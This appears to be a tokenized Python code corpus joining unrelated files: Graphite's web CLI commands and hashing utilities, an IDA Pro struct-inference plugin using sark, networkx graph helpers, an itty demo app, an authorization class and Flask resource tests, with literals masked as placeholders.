func_name ) <EOL> self . setKeyFunction ( keyfunc ) </s>
<s> """<STR_LIT>""" <EOL> import sys , os , urllib , time , traceback , cgi , re , socket <EOL> from cPickle import load , dump <EOL> from itertools import chain <EOL> from django . conf import settings <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from graphite . util import getProfile , getProfileByUsername <EOL> from graphite . logger import log <EOL> from graphite . account . models import Profile , MyGraph , Variable , View , Window <EOL> def printException ( ) : <EOL> out = "<STR_LIT>" <EOL> out += traceback . format_exc ( ) <EOL> out += "<STR_LIT>" <EOL> return stdout ( out ) <EOL> def stdout ( text , lineBreak = True ) : <EOL> text = text . replace ( '<STR_LIT:">' , "<STR_LIT:'>" ) <EOL> text = text . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> br = '<STR_LIT>' <EOL> if lineBreak : br = "<STR_LIT>" <EOL> return """<STR_LIT>""" % ( text , br ) <EOL> def stderr ( text ) : <EOL> return """<STR_LIT>""" % text . replace ( '<STR_LIT:">' , "<STR_LIT:'>" ) <EOL> def _set ( request , name , value ) : <EOL> profile = getProfile ( request ) <EOL> try : <EOL> variable = profile . variable_set . get ( name = name ) <EOL> variable . value = value <EOL> except ObjectDoesNotExist : <EOL> variable = Variable ( profile = profile , name = name , value = value ) <EOL> variable . save ( ) <EOL> return '<STR_LIT>' <EOL> def _unset ( request , name ) : <EOL> profile = getProfile ( request ) <EOL> try : <EOL> variable = profile . variable_set . get ( name = name ) <EOL> variable . delete ( ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % name ) <EOL> return '<STR_LIT>' <EOL> def _echo ( request , args ) : <EOL> return stdout ( args ) <EOL> def _vars ( request ) : <EOL> profile = getProfile ( request ) <EOL> out = '<STR_LIT>' <EOL> for variable in profile . variable_set . all ( ) : <EOL> out += '<STR_LIT>' % ( variable . name , variable . value ) <EOL> out += '<STR_LIT>' <EOL> return stdout ( out ) <EOL> def _clear ( request ) : <EOL> return "<STR_LIT>" <EOL> def _create ( request , window ) : <EOL> out = '<STR_LIT>' <EOL> w = window . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % ( w , w ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( w , w ) <EOL> return out <EOL> def _draw ( request , targets , _from = None , until = None , template = None , window = None , interval = None ) : <EOL> out = '<STR_LIT>' <EOL> params = [ ( '<STR_LIT:target>' , t ) for t in targets ] <EOL> if _from : params . append ( ( '<STR_LIT>' , _from ) ) <EOL> if until : params . append ( ( '<STR_LIT>' , until ) ) <EOL> if template : params . append ( ( '<STR_LIT>' , template ) ) <EOL> url = '<STR_LIT>' + urllib . urlencode ( params ) <EOL> if window : <EOL> w = window <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % url <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> if interval : <EOL> i = int ( interval ) <EOL> out += "<STR_LIT>" % ( w , i ) <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> else : <EOL> return stdout ( "<STR_LIT>" % url ) <EOL> return out <EOL> def _redraw ( request , window , interval ) : <EOL> out = '<STR_LIT>' <EOL> w = window <EOL> i = int ( interval ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( w , w ) <EOL> out += "<STR_LIT>" % ( w , i ) <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _email ( request , window , addressList ) : <EOL> out = '<STR_LIT>' <EOL> w = window <EOL> addrList = '<STR_LIT:U+002C>' . join ( addressList ) <EOL> params = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : addrList , '<STR_LIT:title>' : w } <EOL> paramStr = urllib . urlencode ( params ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % paramStr <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _doemail ( request ) : <EOL> cgiParams = request . GET <EOL> assert '<STR_LIT>' in cgiParams and '<STR_LIT:url>' in cgiParams and '<STR_LIT:title>' in cgiParams , "<STR_LIT>" <EOL> import smtplib , httplib , urlparse <EOL> from email . MIMEMultipart import MIMEMultipart <EOL> from email . MIMEText import MIMEText <EOL> from email . MIMEImage import MIMEImage <EOL> url = cgiParams [ '<STR_LIT:url>' ] <EOL> title = cgiParams [ '<STR_LIT:title>' ] <EOL> recipients = cgiParams [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> proto , server , path , query , frag = urlparse . urlsplit ( url ) <EOL> if query : path += '<STR_LIT:?>' + query <EOL> conn = httplib . HTTPConnection ( server ) <EOL> conn . request ( '<STR_LIT:GET>' , path ) <EOL> resp = conn . getresponse ( ) <EOL> assert resp . status == <NUM_LIT:200> , "<STR_LIT>" % ( resp . status , resp . reason ) <EOL> rawData = resp . read ( ) <EOL> conn . close ( ) <EOL> message = MIMEMultipart ( ) <EOL> message [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> message [ '<STR_LIT>' ] = '<STR_LIT:U+002CU+0020>' . join ( recipients ) <EOL> message [ '<STR_LIT>' ] = '<STR_LIT>' % socket . gethostname ( ) <EOL> text = MIMEText ( "<STR_LIT>" % ( time . ctime ( ) , url ) ) <EOL> image = MIMEImage ( rawData ) <EOL> image . add_header ( '<STR_LIT>' , '<STR_LIT>' , filename = title + time . strftime ( "<STR_LIT>" ) ) <EOL> message . attach ( text ) <EOL> message . attach ( image ) <EOL> server = smtplib . SMTP ( settings . SMTP_SERVER ) <EOL> server . sendmail ( '<STR_LIT>' % socket . gethostname ( ) , recipients , message . as_string ( ) ) <EOL> server . quit ( ) <EOL> return stdout ( "<STR_LIT>" % ( url , cgiParams [ '<STR_LIT>' ] ) ) <EOL> def _code ( request , code ) : <EOL> return code <EOL> def _url ( request , window ) : <EOL> out = '<STR_LIT>' <EOL> w = window <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _help ( request ) : <EOL> return "<STR_LIT>" % settings . DOCUMENTATION_URL <EOL> def _change ( request , window , var , value ) : <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % var <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % value <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( var , value ) <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> if window == '<STR_LIT:*>' : <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> else : <EOL> out += "<STR_LIT>" % window <EOL> return out <EOL> def _add ( request , target , window ) : <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % target <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _remove ( request , target , window ) : <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % target <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % target <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _find ( request , pattern ) : <EOL> pattern = pattern . strip ( ) <EOL> r = re . compile ( pattern , re . I ) <EOL> out = '<STR_LIT>' <EOL> found = <NUM_LIT:0> <EOL> displayMax = <NUM_LIT:100> <EOL> rrdIndex = open ( settings . STORAGE_DIR + '<STR_LIT>' ) <EOL> wspIndex = open ( settings . STORAGE_DIR + '<STR_LIT>' ) <EOL> for line in chain ( wspIndex , rrdIndex ) : <EOL> if r . search ( line ) : <EOL> found += <NUM_LIT:1> <EOL> if found <= displayMax : <EOL> out += line . replace ( '<STR_LIT:/>' , '<STR_LIT:.>' ) <EOL> if found >= displayMax : <EOL> out += '<STR_LIT>' % ( displayMax , found ) <EOL> else : <EOL> out += '<STR_LIT>' % found <EOL> return stdout ( out ) <EOL> def _save ( request , view ) : <EOL> if not settings . ALLOW_ANONYMOUS_CLI and not request . user . is_authenticated ( ) : <EOL> return stderr ( "<STR_LIT>" ) <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % view <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _dosave ( request , viewName ) : <EOL> profile = getProfile ( request ) <EOL> log . info ( "<STR_LIT>" % ( viewName , profile . user . username ) ) <EOL> try : <EOL> view = profile . view_set . get ( name = viewName ) <EOL> except ObjectDoesNotExist : <EOL> view = View ( profile = profile , name = viewName ) <EOL> view . save ( ) <EOL> view . window_set . all ( ) . delete ( ) <EOL> for windowName , encodedString in request . GET . items ( ) : <EOL> try : <EOL> if windowName in ( '<STR_LIT:_>' , '<STR_LIT>' ) : continue <EOL> paramString = urllib . unquote_plus ( encodedString ) <EOL> queryParams = cgi . parse_qs ( paramString ) <EOL> modelParams = { } <EOL> for key , value in queryParams . items ( ) : <EOL> key = str ( key ) <EOL> value = str ( value [ <NUM_LIT:0> ] ) <EOL> if key in ( '<STR_LIT>' , '<STR_LIT:left>' ) : <EOL> value = int ( float ( value . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> if key in ( '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> value = int ( float ( value ) ) <EOL> modelParams [ key ] = value <EOL> if '<STR_LIT>' not in modelParams : <EOL> modelParams [ '<STR_LIT>' ] = None <EOL> win = Window ( view = view , name = windowName , ** modelParams ) <EOL> win . save ( ) <EOL> except : <EOL> log . exception ( "<STR_LIT>" % windowName ) <EOL> return stdout ( '<STR_LIT>' % viewName ) <EOL> def _load ( request , viewName , above = None ) : <EOL> if above : <EOL> out = stdout ( "<STR_LIT>" % viewName ) <EOL> else : <EOL> out = stdout ( "<STR_LIT>" % viewName ) <EOL> profile = getProfile ( request ) <EOL> try : <EOL> view = profile . view_set . get ( name = viewName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % viewName ) <EOL> if not above : <EOL> out += "<STR_LIT>" <EOL> for window in view . window_set . all ( ) : <EOL> out += _create ( request , window . name ) <EOL> out += "<STR_LIT>" % window . name <EOL> out += "<STR_LIT>" % ( window . name , window . url ) <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( window . top , window . left ) <EOL> out += "<STR_LIT>" % ( window . width , window . height ) <EOL> if window . interval : <EOL> out += "<STR_LIT>" % ( window . name , window . interval ) <EOL> out += "<STR_LIT>" % ( ( window . name , ) * <NUM_LIT:3> ) <EOL> return out <EOL> def _gsave ( request , graphName ) : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> out = "<STR_LIT>" % graphName <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % graphName <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _dogsave ( request , graphName ) : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> url = request . GET . get ( '<STR_LIT:url>' ) <EOL> if not url : return stderr ( "<STR_LIT>" ) <EOL> try : <EOL> existingGraph = profile . mygraph_set . get ( name = graphName ) <EOL> existingGraph . url = url <EOL> existingGraph . save ( ) <EOL> except ObjectDoesNotExist : <EOL> try : <EOL> newGraph = MyGraph ( profile = profile , name = graphName , url = url ) <EOL> newGraph . save ( ) <EOL> except : <EOL> log . exception ( "<STR_LIT>" % graphName ) <EOL> return stderr ( "<STR_LIT>" % graphName ) <EOL> return stdout ( "<STR_LIT>" % graphName ) <EOL> def _gload ( request , user = None , graphName = None ) : <EOL> if not user : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> profile = getProfileByUsername ( user ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" ) <EOL> try : <EOL> myGraph = profile . mygraph_set . get ( name = graphName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" ) <EOL> out = _create ( request , myGraph . name ) <EOL> out += "<STR_LIT>" % ( myGraph . name . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) , myGraph . url ) <EOL> return out <EOL> def _graphs ( request , user = None ) : <EOL> if not user : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> if not profile : return stderr ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> profile = getProfileByUsername ( user ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" ) <EOL> out = "<STR_LIT>" <EOL> if user : <EOL> prefix = "<STR_LIT>" % user <EOL> else : <EOL> prefix = "<STR_LIT>" <EOL> for graph in profile . mygraph_set . all ( ) : <EOL> out += stdout ( prefix + graph . name ) <EOL> return out <EOL> def _views ( request ) : <EOL> out = '<STR_LIT>' <EOL> profile = getProfile ( request ) <EOL> for view in profile . view_set . all ( ) : <EOL> windowList = '<STR_LIT:U+002C>' . join ( [ window . name for window in view . window_set . all ( ) ] ) <EOL> out += stdout ( "<STR_LIT>" % ( view . name , windowList ) ) <EOL> return out <EOL> def _rmview ( request , viewName ) : <EOL> profile = getProfile ( request ) <EOL> try : <EOL> view = profile . view_set . get ( name = viewName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % viewName ) <EOL> view . delete ( ) <EOL> return stdout ( "<STR_LIT>" % viewName ) <EOL> def _rmgraph ( request , graphName ) : <EOL> profile = getProfile ( request , allowDefault = False ) <EOL> try : <EOL> graph = profile . mygraph_set . get ( name = graphName ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % graphName ) <EOL> graph . delete ( ) <EOL> return stdout ( "<STR_LIT>" % graphName ) <EOL> def _compose ( request , window ) : <EOL> out = "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" ; <EOL> out += "<STR_LIT>" <EOL> out += stdout ( '<STR_LIT>' ) <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _login ( request ) : <EOL> if request . user . is_authenticated ( ) : <EOL> return stderr ( "<STR_LIT>" % request . user . username ) <EOL> else : <EOL> return "<STR_LIT>" <EOL> def _logout ( request ) : <EOL> if not request . user . is_authenticated ( ) : <EOL> return stderr ( "<STR_LIT>" ) <EOL> else : <EOL> return "<STR_LIT>" <EOL> def _id ( request ) : <EOL> if request . user . is_authenticated ( ) : <EOL> return stdout ( "<STR_LIT>" % request . user . username ) <EOL> else : <EOL> return stdout ( "<STR_LIT>" ) <EOL> _whoami = _id </s>
<s> """<STR_LIT>""" <EOL> from graphite . logger import log <EOL> import time <EOL> try : <EOL> from hashlib import md5 <EOL> except ImportError : <EOL> from md5 import md5 <EOL> import bisect <EOL> def hashRequest ( request ) : <EOL> queryParams = [ "<STR_LIT>" % ( key , '<STR_LIT:&>' . join ( values ) ) <EOL> for ( key , values ) in request . GET . lists ( ) <EOL> if not key . startswith ( '<STR_LIT:_>' ) ] <EOL> normalizedParams = '<STR_LIT:U+002C>' . join ( sorted ( queryParams ) ) or '<STR_LIT>' <EOL> myHash = stripControlChars ( normalizedParams ) <EOL> return compactHash ( myHash ) <EOL> def hashData ( targets , startTime , endTime ) : <EOL> targetsString = '<STR_LIT:U+002C>' . join ( targets ) <EOL> startTimeString = startTime . strftime ( "<STR_LIT>" ) <EOL> endTimeString = endTime . strftime ( "<STR_LIT>" ) <EOL> myHash = targetsString + '<STR_LIT:@>' + startTimeString + '<STR_LIT::>' + endTimeString <EOL> myHash = stripControlChars ( myHash ) <EOL> return compactHash ( myHash ) <EOL> def stripControlChars ( string ) : <EOL> return filter ( lambda char : ord ( char ) >= <NUM_LIT> , string ) <EOL> def compactHash ( string ) : <EOL> hash = md5 ( ) <EOL> hash . update ( string ) <EOL> return hash . hexdigest ( ) <EOL> class ConsistentHashRing : <EOL> def __init__ ( self , nodes , replica_count = <NUM_LIT:100> ) : <EOL> self . ring = [ ] <EOL> self . replica_count = replica_count <EOL> for node in nodes : <EOL> self . add_node ( node ) <EOL> def compute_ring_position ( self , key ) : <EOL> big_hash = md5 ( str ( key ) ) . hexdigest ( ) <EOL> small_hash = int ( big_hash [ : <NUM_LIT:4> ] , <NUM_LIT:16> ) <EOL> return small_hash <EOL> def add_node ( self , key ) : <EOL> for i in range ( self . replica_count ) : <EOL> replica_key = "<STR_LIT>" % ( key , i ) <EOL> position = self . compute_ring_position ( replica_key ) <EOL> entry = ( position , key ) <EOL> bisect . insort ( self . ring , entry ) <EOL> def remove_node ( self , key ) : <EOL> self . ring = [ entry for entry in self . ring if entry [ <NUM_LIT:1> ] != key ] <EOL> def get_node ( self , key ) : <EOL> position = self . compute_ring_position ( key ) <EOL> search_entry = ( position , None ) <EOL> index = bisect . bisect_left ( self . ring , search_entry ) <EOL> index %= len ( self . ring ) <EOL> entry = self . ring [ index ] <EOL> return entry [ <NUM_LIT:1> ] </s>
<s> import idaapi <EOL> import idc <EOL> import sark <EOL> def message ( * messages ) : <EOL> for msg in messages : <EOL> for line in msg . splitlines ( ) : <EOL> idaapi . msg ( "<STR_LIT>" . format ( line ) ) <EOL> class AutoStruct ( idaapi . plugin_t ) : <EOL> flags = idaapi . PLUGIN_PROC <EOL> comment = "<STR_LIT>" <EOL> help = "<STR_LIT>" <EOL> wanted_name = "<STR_LIT>" <EOL> wanted_hotkey = "<STR_LIT>" <EOL> def init ( self ) : <EOL> self . _prev_struct_name = "<STR_LIT>" <EOL> return idaapi . PLUGIN_KEEP <EOL> def term ( self ) : <EOL> pass <EOL> def run ( self , arg ) : <EOL> start , end = sark . get_selection ( ) <EOL> if not sark . structure . selection_has_offsets ( start , end ) : <EOL> message ( '<STR_LIT>' ) <EOL> idaapi . warning ( '<STR_LIT>' ) <EOL> return <EOL> struct_name = idc . AskStr ( self . _prev_struct_name , "<STR_LIT>" ) <EOL> if not struct_name : <EOL> message ( "<STR_LIT>" ) <EOL> return <EOL> self . _prev_struct_name = struct_name <EOL> common_reg = sark . structure . get_common_register ( start , end ) <EOL> reg_name = idc . AskStr ( common_reg , "<STR_LIT>" ) <EOL> if not reg_name : <EOL> message ( "<STR_LIT>" ) <EOL> return <EOL> try : <EOL> offsets , operands = sark . structure . infer_struct_offsets ( start , end , reg_name ) <EOL> except sark . exceptions . InvalidStructOffset : <EOL> message ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> return <EOL> except sark . exceptions . SarkInvalidRegisterName : <EOL> message ( "<STR_LIT>" . format ( reg_name ) ) <EOL> return <EOL> try : <EOL> sark . structure . create_struct_from_offsets ( struct_name , offsets ) <EOL> except sark . exceptions . SarkStructAlreadyExists : <EOL> yes_no_cancel = idc . AskYN ( idaapi . ASKBTN_NO , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if yes_no_cancel == idaapi . ASKBTN_CANCEL : <EOL> return <EOL> elif yes_no_cancel == idaapi . ASKBTN_YES : <EOL> sid = sark . structure . get_struct ( struct_name ) <EOL> sark . structure . set_struct_offsets ( offsets , sid ) <EOL> else : <EOL> pass <EOL> sark . structure . apply_struct ( start , end , reg_name , struct_name ) <EOL> def PLUGIN_ENTRY ( ) : <EOL> return AutoStruct ( ) </s>
<s> import collections <EOL> import itertools <EOL> import networkx as nx <EOL> from . code . function import functions , Function <EOL> from awesome . context import ignored <EOL> from . import exceptions <EOL> def lowest_common_ancestors ( G , targets ) : <EOL> common_ancestors = None <EOL> all_ancestors = set ( ) <EOL> for target in targets : <EOL> parents = set ( ) <EOL> q = collections . deque ( ) <EOL> q . append ( target ) <EOL> while q : <EOL> n = q . popleft ( ) <EOL> if n in parents : <EOL> continue <EOL> for p in G . predecessors_iter ( n ) : <EOL> q . append ( p ) <EOL> parents . add ( n ) <EOL> all_ancestors . update ( parents ) <EOL> if common_ancestors is None : <EOL> common_ancestors = parents <EOL> else : <EOL> common_ancestors &= parents <EOL> lowest_common = set ( ) <EOL> if common_ancestors is not None : <EOL> for p in common_ancestors : <EOL> if any ( child not in common_ancestors and child in all_ancestors for child in G . successors_iter ( p ) ) : <EOL> lowest_common . add ( p ) <EOL> return lowest_common <EOL> def _try_get_function_start ( ea ) : <EOL> with ignored ( exceptions . SarkNoFunction ) : <EOL> return Function ( ea ) . startEA <EOL> return ea <EOL> def get_idb_graph ( ) : <EOL> """<STR_LIT>""" <EOL> digraph = nx . DiGraph ( ) <EOL> for function in functions ( ) : <EOL> for xref in itertools . chain ( function . xrefs_from , function . xrefs_to ) : <EOL> frm = _try_get_function_start ( xref . frm ) <EOL> to = _try_get_function_start ( xref . to ) <EOL> digraph . add_edge ( frm , to ) <EOL> return digraph <EOL> def get_lca_graph ( G , targets , lca_sources = None ) : <EOL> if lca_sources is None : <EOL> lca_sources = lowest_common_ancestors ( G , targets ) <EOL> lca_graph = nx . DiGraph ( ) <EOL> for source in lca_sources : <EOL> for target in targets : <EOL> path = nx . shortest_path ( G , source , target ) <EOL> for frm , to in itertools . izip ( path [ : - <NUM_LIT:1> ] , path [ <NUM_LIT:1> : ] ) : <EOL> lca_graph . add_edge ( frm , to ) <EOL> return lca_graph </s>
<s> import importlib <EOL> from . exceptions import UnknownModuleError , UnknownCallableError <EOL> def determine_module ( func ) : <EOL> """<STR_LIT>""" <EOL> return func . __module__ <EOL> def determine_name ( func ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> return func . __name__ <EOL> elif hasattr ( func , '<STR_LIT>' ) : <EOL> return func . __class__ . __name__ <EOL> raise AttributeError ( "<STR_LIT>" . format ( <EOL> func <EOL> ) ) <EOL> def import_module ( module_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return importlib . import_module ( module_name ) <EOL> except ImportError as err : <EOL> raise UnknownModuleError ( str ( err ) ) <EOL> def import_attr ( module_name , attr_name ) : <EOL> """<STR_LIT>""" <EOL> module = import_module ( module_name ) <EOL> try : <EOL> return getattr ( module , attr_name ) <EOL> except AttributeError as err : <EOL> raise UnknownCallableError ( str ( err ) ) </s>
<s> from itty import * <EOL> @ error ( <NUM_LIT> ) <EOL> def my_great_500 ( request , exception ) : <EOL> html_output = """<STR_LIT>""" % exception <EOL> response = Response ( html_output , status = <NUM_LIT> ) <EOL> return response . send ( request . _start_response ) <EOL> @ get ( '<STR_LIT>' ) <EOL> def hello ( request ) : <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_404 ( request ) : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_500 ( request ) : <EOL> raise AppError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_other ( request ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_403 ( request ) : <EOL> raise Forbidden ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> @ get ( '<STR_LIT>' ) <EOL> def test_redirect ( request ) : <EOL> raise Redirect ( '<STR_LIT>' ) <EOL> run_itty ( ) </s>
<s> class Authorization ( object ) : <EOL> """<STR_LIT>""" <EOL> def __get__ ( self , instance , owner ) : <EOL> """<STR_LIT>""" <EOL> self . resource_meta = instance <EOL> return self <EOL> def is_authorized ( self , request , object = None ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> class ReadOnlyAuthorization ( Authorization ) : <EOL> """<STR_LIT>""" <EOL> def is_authorized ( self , request , object = None ) : <EOL> """<STR_LIT>""" <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return True <EOL> else : <EOL> return False </s>
<s> import os <EOL> import sys <EOL> from os . path import abspath , dirname , join <EOL> from django . core . management import execute_manager <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> try : <EOL> import settings_core as settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> import unittest <EOL> import flask <EOL> from restless . fl import FlaskResource <EOL> from restless . utils import json <EOL> from . fakes import FakeHttpRequest <EOL> class FlTestResource ( FlaskResource ) : <EOL> fake_db = [ ] <EOL> def fake_init ( self ) : <EOL> self . __class__ . fake_db = [ <EOL> { "<STR_LIT:id>" : <NUM_LIT:2> , "<STR_LIT:title>" : '<STR_LIT>' } , <EOL> { "<STR_LIT:id>" : <NUM_LIT:4> , "<STR_LIT:title>" : '<STR_LIT>' } , <EOL> { "<STR_LIT:id>" : <NUM_LIT:5> , "<STR_LIT:title>" : '<STR_LIT>' } , <EOL> ] <EOL> def list ( self ) : <EOL> return self . fake_db <EOL> def detail ( self , pk ) : <EOL> for item in self . fake_db : <EOL> if item [ '<STR_LIT:id>' ] == pk : <EOL> return item <EOL> def create ( self ) : <EOL> self . fake_db . append ( self . data ) <EOL> class FlaskResourceTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( FlaskResourceTestCase , self ) . setUp ( ) <EOL> self . res = FlTestResource ( ) <EOL> self . app = flask . Flask ( '<STR_LIT>' ) <EOL> self . app . config [ '<STR_LIT>' ] = True <EOL> self . res . fake_init ( ) <EOL> def test_as_list ( self ) : <EOL> list_endpoint = FlTestResource . as_list ( ) <EOL> flask . request = FakeHttpRequest ( '<STR_LIT:GET>' ) <EOL> with self . app . test_request_context ( '<STR_LIT>' , method = '<STR_LIT:GET>' ) : <EOL> resp = list_endpoint ( ) <EOL> self . assertEqual ( resp . headers [ '<STR_LIT:Content-Type>' ] , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( json . loads ( resp . data . decode ( '<STR_LIT:utf-8>' ) ) , { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } 